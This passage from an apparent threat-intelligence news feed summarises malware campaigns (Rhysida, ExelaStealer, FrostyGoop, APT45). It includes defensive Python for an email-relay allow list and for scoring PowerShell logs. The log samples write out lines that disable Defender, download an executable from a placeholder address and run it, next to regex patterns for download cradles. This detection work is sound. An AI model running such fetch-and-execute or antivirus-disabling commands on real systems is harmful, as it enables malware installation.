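    ip = ipaddress.ip_address(msg.client_ip)
    if not any(ip in net for net in M365_NETS):
        return "reject: connecting host is not Microsoft 365"
    if not policy.allow_any_tenant and msg.originator_org.lower() not in policy.allowed_tenants:
        return "reject: tenant not on allow list"
    hdr = _domain(msg.header_from)
    if policy.require_alignment and hdr in policy.customer_domains and _domain(msg.mail_from) != hdr:
        # The envelope still names the real tenant; without this check the forged
        # From: would be DKIM-signed for the customer's domain on the way out.
        return "reject: From header spoofs a customer domain"
    return "accept"


WEAK = RelayPolicy(customer_domains={"customer.example"}, allow_any_tenant=True)
HARDENED = RelayPolicy(customer_domains={"customer.example"},
                       allowed_tenants={"customer.example", "partner.example"},
                       require_alignment=True)

# Constructed relay attempts; 23gdfs56gsd.onmicrosoft.com is the tenant name quoted in the write-up.
SAMPLES = {
    "legit": Message("52.100.10.20", "alice@customer.example", "alice@customer.example", "customer.example"),
    "spoofed-customer": Message("52.101.3.4", "bulk@23gdfs56gsd.onmicrosoft.com",
                                "ceo@customer.example", "23gdfs56gsd.onmicrosoft.com"),
    "random-tenant": Message("40.107.8.9", "promo@23gdfs56gsd.onmicrosoft.com",
                             "promo@23gdfs56gsd.onmicrosoft.com", "23gdfs56gsd.onmicrosoft.com"),
    "partner-spoof": Message("40.93.1.2", "it@partner.example", "ceo@customer.example", "partner.example"),
    "not-m365": Message("203.0.113.7", "bulk@example.net", "bulk@example.net", "example.net"),
}


def evaluate_samples():
    """Return {name: (decision under WEAK, decision under HARDENED)}."""
    return {name: (decide(m, WEAK), decide(m, HARDENED)) for name, m in SAMPLES.items()}


if __name__ == "__main__":
    for name, (weak, hardened) in evaluate_samples().items():
        print(f"{name:17} weak={weak:45} hardened={hardened}")
```

The order of checks follows the write-up: the abused configuration stopped after confirming the message came from Microsoft 365 at all, so every tenant in the service could relay; the tenant allow list is the control Proofpoint added; and the alignment check covers the remaining case the page describes, a forged From: on a customer domain that would otherwise be DKIM-signed as it leaves, because the RFC 5321 sender still names the real tenant. Legitimate third-party senders that put a customer domain in From: but use their own bounce domain would fail that alignment check, so they need explicit entries rather than a blanket exception.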
RiskIQ.webp 2024-07-26 21:04:13 Rhysida using Oyster Backdoor to deliver ransomware
(direct link)
#### Targeted industries
- Education
## Snapshot
Malwarebytes has identified a recent attack by the Rhysida ransomware gang that used a new variant of the Oyster backdoor, also known as Broomstick. Read Microsoft's [tool profile on Rhysida ransomware](https://security.microsoft.com/intel-profiles/54FA2B350E8F22DA059F8463E93142A39C18A30C5BA1B9F3A4631A4979A9B507) for more information.
## Description
This is an updated version of the Oyster campaign reported by [Rapid7](https://www.rapid7.com/blog/post/2024/06/17/malvertising-campaign-leads-to-execution-of-oyster-backdoor/), which used SEO-poisoned search results to trick users into downloading malicious installers posing as legitimate software such as Google Chrome and Microsoft Teams, in order to drop the Oyster backdoor. The attack from the updated campaign targeted a prominent private school and involved deploying the Oyster backdoor on a client endpoint, likely originating from a malicious IP scanner distributed through malvertising. The attackers accessed network-attached storage (NAS) devices and virtual machine (VM) software using stolen Secure Shell (SSH) credentials to bypass security measures and ultimately deploy Rhysida ransomware, encrypting files and local backups.
## Additional analysis
According to [Malpedia](https://malpedia.caad.fkie.fraunhofer.de/details/win.broomstick), Oyster (also tracked as Broomstick, CleanBoost and CleanUp) is a backdoor first observed in 2023. More recent campaigns have deployed the Oyster backdoor directly. Typically, Oyster is used by threat actors to aid ransomware deployment, because it can collect system data, communicate with a command-and-control server, and execute additional files.
## Detections/Hunting queries
**Microsoft Defender Antivirus**
Microsoft Defender Antivirus detects threat components as the following malware:
- [Ransom:Win64/Rhysida](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win64/Rhysida.A!dha&threatId=-2147114922&ocid=magicti_ta_ency)
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
- Harden internet-facing assets and identify and secure perimeter systems that attackers might use to access the network. Public scanning interfaces, such as [Microsoft Defender External Attack Surface Management](https://www.microsoft.com/security/business/cloud-security/microsoft-defender-external-attack-surface-management?ocid=magicti_ta_abbreviatedmktgpage), can be used to augment data. The Attack Surface Summary dashboard surfaces assets, such as Exchange servers, that require security updates and provides recommended remediation steps.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
- Run [endpoint detection and response (EDR) in block mode](https://learn.microsoft.com/micr
Ransomware Malware Tool Threat ★★★
RiskIQ.webp 2024-07-26 20:46:44 ExelaStealer Delivered "From Russia With Love"
(direct link)
## Snapshot
The SANS Technology Institute Internet Storm Center reported a threat involving the delivery of ExelaStealer, downloaded from a Russian IP address. The attack involves the use of a PowerShell script to download a file from a Russian source, which attempts to disable antivirus protection or prompts the victim to do so.
## Description
The PowerShell script downloads two PE files, one of which is a self-extracting RAR archive communicating with "solararbx\[.\]online". The other file, "service.exe", is ExelaStealer, developed in Python and using Discord as a command and control channel for reconnaissance activities via a script, including gathering system information and user details. The script contains comments in Russian, and ExelaStealer is also believed to have originated from Russia. The PowerShell script is simple and has a low VT score of 8/65. At this time, the purpose of the RAR archive is unknown.
## Detections/Hunting Queries
Microsoft Defender Antivirus detects threat components as the following malware:
- [Trojan:Win32/DCRat.MQ!MTB](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/DCRat.MQ!MTB)
## References
[ExelaStealer Delivered "From Russia With Love"](https://isc.sans.edu/diary/rss/31118). SANS Technology Institute Internet Storm Center (accessed 2024-07-26)
## Copyright
**© Microsoft 2024**. All rights reserved. Reproduction or distribution of the content of this site, or any part thereof, without written permission of Microsoft is prohibited.
Malware Threat ★★
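The delivery chain above (a simple PowerShell script that fetches executables and tries to switch off antivirus, or asks the victim to) is exactly what Script Block Logging makes visible. As an added example that is not part of the SANS diary or the Microsoft write-up, the Python below triages constructed excerpts of PowerShell script-block log text (event ID 4104) with weighted indicators and pulls out defanged hosts. The log lines, the `Set-MpPreference` tampering shape, the lure wording and the address 203.0.113.44 (standing in for the Russian IP) are all assumptions made for the example, not strings from the real sample.

```python
import re

# Constructed Script Block Logging (event ID 4104) excerpts. "malicious" mimics the
# behaviour the diary describes but is not the actual script; 203.0.113.44 is a
# documentation address, and intranet.corp.example is a made-up internal host.
LOGS = {
    "benign": r"Get-ChildItem C:\Logs -Filter *.log | Select-String -Pattern 'ERROR'",
    "admin": r"Invoke-WebRequest -Uri https://intranet.corp.example/tools/agent.msi -OutFile $env:TEMP\agent.msi; "
             r"Start-Process msiexec.exe -ArgumentList '/i agent.msi /quiet' -Wait",
    "malicious": r'Set-MpPreference -DisableRealtimeMonitoring $true; '
                 r'(New-Object Net.WebClient).DownloadFile("http://203.0.113.44/service.exe", "$env:TEMP\service.exe"); '
                 r'Start-Process "$env:TEMP\service.exe"',
    "lure": r"Write-Host 'Disable your antivirus, then run the update'; "
            r"iwr http://203.0.113.44/update.exe -OutFile update.exe",
}

# Indicator -> (pattern, weight). Download and execution are weak on their own
# (admins do both); tampering with Defender, or telling the user to, is what
# pushes a block into alert territory.
INDICATORS = {
    "download_cradle": (re.compile(
        r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|DownloadFile|DownloadString|"
        r"Start-BitsTransfer|\bcurl\b|\bwget\b", re.I), 2),
    "execute": (re.compile(r"Start-Process|Invoke-Expression|\biex\b|Invoke-Item", re.I), 2),
    "av_tamper": (re.compile(r"Set-MpPreference\s+-Disable\w+|Add-MpPreference\s+-Exclusion\w+", re.I), 5),
    "av_prompt": (re.compile(r"disable\s+(your\s+)?(anti-?virus|defender|protection)", re.I), 3),
}
ALERT, SUSPICIOUS = 5, 3
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)", re.I)


def score_block(text: str):
    """Return (score, [matched indicator names]) for one script block."""
    hits = [name for name, (pattern, _w) in INDICATORS.items() if pattern.search(text)]
    return sum(INDICATORS[name][1] for name in hits), hits


def verdict(score: int) -> str:
    if score >= ALERT:
        return "alert"
    if score >= SUSPICIOUS:
        return "suspicious"
    return "benign"


def defanged_hosts(text: str):
    """Hosts from every URL in the block, defanged for safe sharing (203[.]0[.]113[.]44)."""
    return sorted({host.replace(".", "[.]") for host in URL_HOST.findall(text)})


def triage(blocks: dict):
    """Triage {block_id: script text} into verdict, score, indicators and IOCs."""
    result = {}
    for block_id, text in blocks.items():
        score, hits = score_block(text)
        result[block_id] = {"verdict": verdict(score), "score": score,
                            "hits": hits, "iocs": defanged_hosts(text)}
    return result


if __name__ == "__main__":
    for block_id, info in triage(LOGS).items():
        print(f"{block_id:10} {info['verdict']:10} score={info['score']} "
              f"hits={info['hits']} iocs={info['iocs']}")
```

The software-install block scores as suspicious, not an alert: download-then-execute is a hunting lead that an allow list of internal hosts would clear, whereas the Defender change and the "disable your antivirus" lure are what distinguish the stealer's dropper from an admin script. Event 4104 is the right source because it logs the de-obfuscated block PowerShell actually runs, so an encoded command line still lands here in readable form.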
RiskIQ.webp 2024-07-26 19:24:17 (Déjà vu) Scam Attacks Taking Advantage of the Popularity of the Generative AI Wave
(direct link)
## Snapshot
Palo Alto Networks analysts have found that cyber threat actors are exploiting the growing interest in generative artificial intelligence (GenAI) to conduct malicious activities.
## Description
Palo Alto Networks' analysis of domains registered with GenAI-related keywords revealed insights into suspicious activities, including textual patterns and traffic volume. Case studies detailed various attack types, such as delivery of potentially unwanted programs (PUPs), spam distribution, and monetized domain parking.
Adversaries often exploit trending topics by registering domains with relevant keywords. Analyzing newly registered domains (NRDs) containing GenAI keywords such as "chatgpt" and "sora", Palo Alto Networks detected more than 200,000 NRDs per day, with about 225 GenAI-related domains registered every day since November 2022. Many of these domains, identified as suspicious, saw registration spikes around major ChatGPT milestones, such as its integration with Bing and the release of GPT-4. Suspicious domains accounted for an average rate of 28.75%, significantly higher than the rate for NRDs in general. Most traffic to these domains was directed to a few major actors, with 35% of that traffic identified as suspicious.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
- Encourage users to use Microsoft Edge and other web browsers that support [SmartScreen](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/web-protection-overview?ocid=magicti_ta_learndoc), which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
- Enforce MFA on all accounts, remove users excluded from MFA, and strictly [require MFA](https://learn.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-policy?ocid=magicti_ta_learndoc) from all devices, in all locations, at all times.
- Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. [Refer to this article](https://learn.microsoft.com/azure/active-directory/authentication/concept-authentication-methods?ocid=magicti_ta_learndoc) for the different authentication methods and features.
- For MFA that uses authenticator apps, ensure that the app requires a code to be typed in where possible, since many intrusions where MFA was enabled still succeeded because users clicked "Yes" on the prompt on their phones even when they were not at their [devices](https://learn.microsoft.com/azure/active-directory/authentication/how-to-mfa-number-match?ocid=magicti_ta_learndoc). Refer to [this article](https://learn.microsoft.com/azure/active-directory/authentication/concept-authentication-methods?ocid=magicti_ta_learndoc) for a
Ransomware Spam Malware Tool Threat Studies ChatGPT ★★★
RiskIQ.webp 2024-07-26 18:40:00 North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime's Military and Nuclear Programs
(direct link)
## Snapshot
Several US and international agencies have identified cyber espionage activity associated with the Democratic People's Republic of Korea (DPRK) Reconnaissance General Bureau (RGB) 3rd Bureau, known as Andariel. Microsoft tracks this actor as Onyx Sleet. [Read more about them here.](https://sip.security.microsoft.com/intel-profiles/03ced82eecb35bdb459c47b7821b9b055d1dfa00b56dc1b06f59583bad8833c0)
## Description
The group targets defense, aerospace, nuclear, and engineering entities to obtain sensitive technical information and intellectual property to advance the regime's military and nuclear programs. It funds its activities through ransomware operations against US healthcare entities.
Andariel gains initial access by exploiting web servers using known vulnerabilities, deploys web shells, conducts phishing activity using malicious attachments, and uses standard system discovery and enumeration techniques and privilege escalation with tools like Mimikatz. In addition, the actors have been observed using custom file system enumeration tools, collecting registry hive data, leveraging system logging for discovery, disguising malware in HTTP packets, and using tunneling tools for command-and-control operations. The threat actors have also exfiltrated data to web services, cloud storage, and North Korea-controlled servers using utilities like PuTTY and WinSCP, and have staged files for exfiltration on victim machines.
## Detections/Hunting queries
Microsoft Defender Antivirus
Microsoft Defender Antivirus detects threat components as the following malware:
- [Trojan:Win32/VinoSiren](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/VinoSiren.L!dha)
- [Trojan:Win64/HazyLoad](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/HazyLoad.A!dha&threatId=-2147074394)
- [Trojan:Win64/Dtrack.B!dha](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/Dtrack.B!dha&threatId=-2147062589)
Microsoft Defender for Endpoint
Alerts with the following title in the security center can indicate threat activity on your network:
- Onyx Sleet activity group
The following alert might also indicate threat activity associated with this threat. This alert, however, can be triggered by unrelated threat activity and is not monitored in the status cards provided with this report.
- [Behavior:Win32/CertutilPE.A](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/OfficeExecCertutil.A&threatId=2147781013&ocid=magicti_ta_ency)
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
- Enable [network protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worl
Ransomware Malware Tool Vulnerability Threat Medical Cloud Technical ★★★
Blog.webp 2024-07-26 17:22:17 Researchers Warn of Increased Cyberterrorism Activity Targeting Paris Olympics
(direct link)
Cyberterrorism is on the rise, posing a significant threat to global events like the Paris Olympics and elections,…
Threat ★★★
RiskIQ.webp 2024-07-26 15:00:23 Flame Stealer
(direct link)
## Snapshot
Analysts at Cyfirma have released a report on the widespread adoption of Flame Stealer, an [information stealer](https://security.microsoft.com/intel-profiles/byExternalId/2296d491ea381b532b24f2575f9418d4b6723c17b8a1f507d20c2140a75d16d6) malware for sale on Discord and Telegram.
## Description
Designed to steal Discord tokens, browser cookies, and credentials, this tool has been used by numerous threat actors employing various evasion techniques. Initially advertised as untraceable, Flame Stealer operates mainly on Discord, targeting sensitive data from platforms like Discord, Spotify, Instagram, TikTok, and Roblox. The malware is programmed in C/C++, employs DLL side-loading, and sends stolen data to specified webhooks. Flame Stealer achieves persistence by adding programs to startup folders and uses code obfuscation techniques to evade detection. It also gathers extensive system information and can capture clipboard data and webcam footage. Flame Stealer uses Discord webhooks for data exfiltration and can shut down or reboot the target machine.
## Microsoft Analysis
In recent years, Microsoft has tracked the growing risk that infostealers pose to enterprise security. Infostealers are commodity malware used to steal information from a target device and send it to the threat actor. The popularity of this class of malware led to the emergence of an infostealer ecosystem and a new class of threat actors who leveraged these capabilities to conduct their attacks. Often, infostealers are advertised as a malware as a service (MaaS) offering, a business model where the developers lease the infostealer payload to distributors for a fee. Information stealers are versatile and can be distributed in various forms, including through phishing email campaigns, malvertising, and trojanized software, games and tools. They can target a range of information like session tokens and cookies, saved passwords, financial information, and credentials for internet-facing systems and applications. Typically, once the user downloads and launches the malicious payload, it establishes command and control (C2) connections with suspicious domains. Once infected, the infostealer attempts to collect and ultimately exfiltrate information from the system, including files, browsers, internet-facing devices and applications, to the C2 servers.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
- Check your Office 365 email filtering settings to ensure you block spoofed emails, spam, and emails with malware. Use [Microsoft Defender for Office 365](https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-for-office-365?ocid=magicti_ta_learndoc) for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Microsoft Defender for Office 365 to [recheck links on click](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-links-about?ocid=magicti_ta_learndoc) and [delete sent mail](https://learn.microsoft.com/microsoft-365/security/office-365-security/zero-hour-auto-purge?ocid=magicti_ta_learndoc) in response to newly acquired threat intelligence. Turn on [safe attachments policies](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-attachments-policies-configure?ocid=magicti_ta_learndoc) to check attachments to inbound email.
- Encourage users to use Microsoft Edge and other web browsers that support [SmartScreen](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/web-protection-overview?ocid=magicti_ta_learndoc), which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta
Ransomware Spam Malware Tool Threat ★★★
InfoSecurityMag.webp 2024-07-26 14:00:00 Hacktivists Claim Leak of CrowdStrike Threat Intelligence
(direct link)
CrowdStrike has acknowledged the claims by the USDoD hacktivist group, which has provided a link to download the alleged threat actor list on a cybercrime forum
Threat ★★★
ESET.webp 2024-07-26 11:57:23 Telegram for Android hit by a zero-day exploit – Week in security with Tony Anscombe (direct link)
Attackers abusing the "EvilVideo" vulnerability could share malicious Android payloads via Telegram channels, groups, and chats, all while making them appear as legitimate multimedia files
Vulnerability Threat Mobile ★★★
The_Hackers_News.webp 2024-07-26 11:22:00 CrowdStrike Warns of New Phishing Scam Targeting German Customers
(direct link)
CrowdStrike is alerting about an unfamiliar threat actor attempting to capitalize on the Falcon Sensor update fiasco to distribute dubious installers targeting German customers as part of a highly targeted campaign. The cybersecurity company said it identified what it described as an unattributed spear-phishing attempt on July 24, 2024, distributing an inauthentic CrowdStrike Crash Reporter
Threat ★★★
bleepingcomputer.webp 2024-07-26 10:28:35 Russian ransomware gangs account for 69% of all ransom proceeds
(direct link)
Russian-speaking threat actors accounted for at least 69% of all crypto proceeds linked to ransomware throughout the previous year, exceeding $500,000,000. [...]
Ransomware Threat ★★★★
InfoSecurityMag.webp 2024-07-26 10:02:00 North Korean Hackers Target Critical Infrastructure for Military Gain
(direct link)
A joint advisory by the UK, US and South Korea has warned of a global espionage campaign by a North Korean threat actor, Andariel, targeting CNI organizations
Threat ★★★
News.webp 2024-07-26 01:34:07 Malware crew Stargazers Goblin used 3,000 GitHub accounts to make bank
(direct link)
May even have targeted other malware gangs, and infosec researchers. Infosec researchers have discovered a network of over three thousand malicious GitHub accounts used to spread malware, targeting groups including gamers, malware researchers, and even other threat actors who themselves seek to spread malware…
Malware Threat ★★
News.webp 2024-07-25 22:34:43 Beware of fake CrowdStrike domains pumping out Lumma infostealing malware
(direct link)
PSA: Only accept updates via official channels ... Ironically enough, CrowdStrike is the latest lure being used to trick Windows users into downloading and running the notorious Lumma infostealing malware, according to the security shop's threat intel team, which spotted the scam just days after the Falcon sensor update fiasco…
Malware Threat ★★★
RiskIQ.webp 2024-07-25 20:14:43 FrostyGoop malware attack cut off heat in Ukraine during winter (direct link) ## Snapshot Cybersecurity vendor Dragos has identified the use of FrostyGoop, Windows malware linked to Russian threat groups, in a January 2024 cyberattack that disrupted heating in more than 600 apartment buildings in Lviv, Ukraine. The malware targets industrial control systems (ICS) using the Modbus TCP communications protocol. ## Description The attackers gained initial access to the victim's network nearly a year earlier by exploiting a vulnerability in an internet-exposed MikroTik router. They maintained access using a web shell, stole user credentials, and eventually hijacked the district heating system's controllers, downgrading their firmware to evade detection. Because the victim provider's network was not segmented, the hackers pivoted to compromise the internal network and deployed the FrostyGoop malware. FrostyGoop is ICS-specific malware written in Golang that interacts directly with ICS using Modbus TCP over port 502. The malware then sent commands over the internal Ethernet network to the ENCO controllers, which the provider used to manage heating boilers and pumps. According to Dragos, the incident is notable because FrostyGoop is the first ICS malware strain focused on abusing the Modbus protocol, which is one of the most popular ICS protocols.
### Additional Analysis Dragos did not attribute the attack, but other cybersecurity researchers report that the TTPs match activity of the Russia-based threat actor [Seashell Blizzard](https://security.microsoft.com/intel-profiles/cf1e406a16835d56cf614430aea3962d7ed99f01eeeeeE3D9EE3048078288E5201BB) (aka Sandworm, APT44, Iridium). Russia aggressively targets Ukrainian critical infrastructure with both cyberattacks and missiles. For example, in April, Ukraine's Computer Emergency Response Team (CERT-UA) reported that [Seashell Blizzard had targeted](https://therecord.media/frostygoop-malware-ukraine-heat) nearly 20 energy facilities in Ukraine in the spring, potentially to amplify the impact of intense Russian missile and drone strikes on critical infrastructure. ## Recommendations Dragos recommends that organizations implement the SANS 5 Critical Controls for world-class OT cybersecurity. These include ICS incident response, defensible architecture, ICS network visibility and monitoring, secure remote access, and risk-based vulnerability management. In addition, Dragos provides the following recommendations: 1.
ICS Incident Response Given the complexity and targeted nature of the FrostyGoop attack, a robust incident response plan is crucial. This plan should incorporate specialized responses for OT environments, as these systems often have operational continuity requirements that supersede those of traditional IT systems. For FrostyGoop, which interacts directly with ICS via Modbus commands, the response plan should include procedures to quickly isolate affected devices, analyze network traffic for unauthorized Modbus commands, and restore correct system operations. Regular training and exercises specific to targeted Modbus and ICS attacks will also ensure readiness and effective incident management. 2. Defensible Architecture This attack highlights the lack of adequate network segmentation and the presence of internet-exposed controllers. To counter threats like FrostyGoop, a defensible architecture must be implemented, pri Malware Vulnerability Threat Industrial ★★★
RiskIQ.webp 2024-07-25 20:11:02 Growing Number of Threats Leveraging AI
(direct link)
## Snapshot Symantec has identified an increase in cyberattacks using large language models (LLMs) to generate malicious code that downloads various payloads. Read more about how Microsoft has partnered with OpenAI to [stay ahead of threat actors in the age of AI](https://security.microsoft.com/intel-explorer/articles/ed40fbef). ## Description LLMs, designed to understand and create human-like text, have applications ranging from writing assistance to customer service automation, but they can also be exploited for malicious purposes. Recent campaigns involve phishing emails carrying code to download malware such as Rhadamanthys, NetSupport and LokiBot. These attacks typically use LLM-generated PowerShell scripts delivered via malicious .lnk files inside password-protected ZIP archives. One example attack involved an urgent funding email with such a ZIP file, containing scripts likely generated by an LLM. Symantec's research confirmed that LLMs such as ChatGPT can easily produce similar scripts. The attack chain comprises initial access via phishing emails, execution of the LLM-generated scripts, and the final payload download. Symantec highlights the growing sophistication of AI-facilitated attacks, underscoring the need for advanced detection capabilities and continuous monitoring to protect against these evolving threats.
## Microsoft Analysis Microsoft has identified actors such as [Forest Blizzard](https://security.microsoft.com/intel-profiles/DD75F93B2A771C9510DCEEC817B9D34D868C2D1353D08C8C1647DE067270FDF8), [Emerald Sleet](HTTP EE4ED596D8AE16F942F442B895752AD9F41DD58E), [Crimson Sandstorm](https://sip.security.microsoft.com/intel-profiles/34E4ACFE2868D450AC93C5C3E6D2DF021E2801BDB3700DD8F172D602DF6DA046), [Charcoal Typhoon](3DB3D52D0495410EFD39D506AAD9A4) and [Salmon Typhoon](https://security.microsoft.com/intel-profiles/5323e9969bf361e48bc236a53189 6) leveraging LLMs to automate and optimize script generation; however, some of these actors have exploited LLMs in other ways, including reconnaissance, vulnerability research, social engineering and language translation. Read more about how these actors interact with and use LLMs on the [Microsoft Security Blog](https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/). ## Detections / Hunting Queries Microsoft Defender Antivirus detects threat components as the following malware: - [*Trojan:MSIL/Lazy*](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=trojan:mil/lazy.beaa!mtb) - [*Trojan:Win32/Oyster*](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=trojan:win32/oyster!mtb) - [*Trojan:JS/Nemucod!MSR*](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=trojan:js/neMucod!msr) - [*Trojan:PowerShell/Malgent*](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=trojan:powershell/malgent!MSR) - [*Trojan:Win32/WinLNK*](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=trojan:win32/Winlnk.al) - [*Trojan:Win32/Rhadamanthys*](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=trojan:win32/rhadamanthyslnk.da!Mtb) - [*Trojan:Win32/Leonem*](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=trojan:win32/leonem) - [*Trojan:JS/Obfuse.NBU*](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=trojan:js/obfuse.nbu) - [*Trojan:Win32/Lokibot*](https://www.mi Malware Vulnerability Threat ChatGPT ★★★
Netskope.webp 2024-07-25 19:49:01 The Hidden Dangers and Opportunities of Generative AI: What Enterprises Need to Know
(direct link)
Since the launch of ChatGPT in November 2022, generative AI (genAI) has seen rapid enterprise adoption. According to researchers in the Netskope Threat Labs, as of June 2024, an astonishing 96% of organizations are using various types of genAI apps. This widespread adoption is transforming how businesses operate, but with great power comes great responsibility, and […]
Threat ChatGPT ★★
The_Hackers_News.webp 2024-07-25 19:38:00 North Korean Hackers Shift from Cyber Espionage to Ransomware Attacks
(direct link)
A North Korea-linked threat actor known for its cyber espionage operations has gradually expanded into financially-motivated attacks that involve the deployment of ransomware, setting it apart from other nation-state hacking groups linked to the country. Google-owned Mandiant is tracking the activity cluster under a new moniker, APT45, which overlaps with names such as Andariel, Nickel Hyatt,
Ransomware Threat APT 15 ★★★
bleepingcomputer.webp 2024-07-25 16:58:16 Critical ServiceNow RCE flaws actively exploited to steal credentials
(direct link)
Threat actors are chaining together ServiceNow flaws using publicly available exploits to breach government agencies and private firms in data theft attacks. [...]
Threat ★★★★
DarkReading.webp 2024-07-25 15:32:05 Security Firm Accidentally Hires North Korean Hacker, Did Not KnowBe4
(direct link)
A software engineer hired for an internal IT AI team immediately became an insider threat by loading malware onto his workstation.
Malware Threat ★★★★
The_Hackers_News.webp 2024-07-25 15:28:00 Webinar: Securing the Modern Workspace: What Enterprises MUST Know about Enterprise Browser Security
(direct link)
The browser is the nerve center of the modern workspace. Ironically, however, the browser is also one of the least protected threat surfaces of the modern enterprise. Traditional security tools provide little protection against browser-based threats, leaving organizations exposed. Modern cybersecurity requires a new approach based on the protection of the browser itself, which offers both
Tool Threat ★★★
cyberark.webp 2024-07-25 14:41:59 5 Strategies for Setting the Right Cybersecurity KPIs
(direct link)
Cybersecurity key performance indicators (KPIs) measure the efficacy of an organization's cybersecurity program. In a rapidly changing threat landscape characterized by new identities, environments and attack methods, many potential KPIs exist to track. Measuring too...
Threat ★★★
Mandiant.webp 2024-07-25 14:00:00 APT45: North Korea's Digital Military Machine
(direct link)
Written by: Taylor Long, Jeff Johnson, Alice Revelli, Fred Plan, Michael Barnhart
Executive Summary APT45 is a long-running, moderately sophisticated North Korean cyber operator that has carried out espionage campaigns as early as 2009. APT45 has gradually expanded into financially-motivated operations, and the group's suspected development and deployment of ransomware sets it apart from other North Korean operators. APT45 and activity clusters suspected of being linked to the group are strongly associated with a distinct genealogy of malware families separate from peer North Korean operators like TEMP.Hermit and APT43. Among the groups assessed to operate from the Democratic People's Republic of Korea (DPRK), APT45 has been the most frequently observed targeting critical infrastructure. Overview Mandiant assesses with high confidence that APT45 is a moderately sophisticated cyber operator that supports the interests of the DPRK. Since at least 2009, APT45 has carried out a range of cyber operations aligned with the shifting geopolitical interests of the North Korean state. Although the group's earliest observed activities consisted of espionage campaigns against government agencies and defense industries, APT45 has expanded its remit to financially-motivated operations, including targeting of the financial vertical; we also assess with moderate confidence that APT45 has engaged in the development of ransomware. Additionally, while multiple DPRK-nexus groups focused on healthcare and pharmaceuticals during the initial stages of the COVID-19 pandemic, APT45 has continued to target this vertical longer than other groups, suggesting an ongoing mandate to collect related information. Separately, the group has conducted operations against nuclear-related entities, underscoring its role in supporting DPRK priorities. Shifts in Targeting and Expanding Operations Similar to other cyber threat activity attributed to North Korea-nexus groups, shifts in APT45 operations have reflected the DPRK's changing priorities.
Malware samples indicate the group was active as early as 2009, although a focus on government agencies and the defense industry was only observed beginning in 2017. Identified activity in 2019 aligned with Pyongyang's continued interest in nuclear issues and energy. Although it is not clear if financially-motivated operations are a focus of APT45's current mandate, the group is distinct from other North Korean operators in its suspected interest in ransomware. Given available information, it is possible that APT45 is carrying out financially-motivated cybercrime not only in support of its own operations but to generate funds for other North Korean state priorities. Financial Sector Like other North Korea
Ransomware Malware Tool Threat Medical APT 37 APT 43 ★★★★★
The_Hackers_News.webp 2024-07-25 13:59:00 Researchers Reveal ConfusedFunction Vulnerability in Google Cloud Platform
(direct link)
Cybersecurity researchers have disclosed a privilege escalation vulnerability impacting Google Cloud Platform's Cloud Functions service that an attacker could exploit to access other services and sensitive data in an unauthorized manner. Tenable has given the vulnerability the name ConfusedFunction. "An attacker could escalate their privileges to the Default Cloud Build Service Account and
Vulnerability Threat Cloud ★★★
Cybereason.webp 2024-07-25 13:08:08 Cuckoo Spear – the latest Nation-state Threat Actor targeting Japanese companies
(direct link)
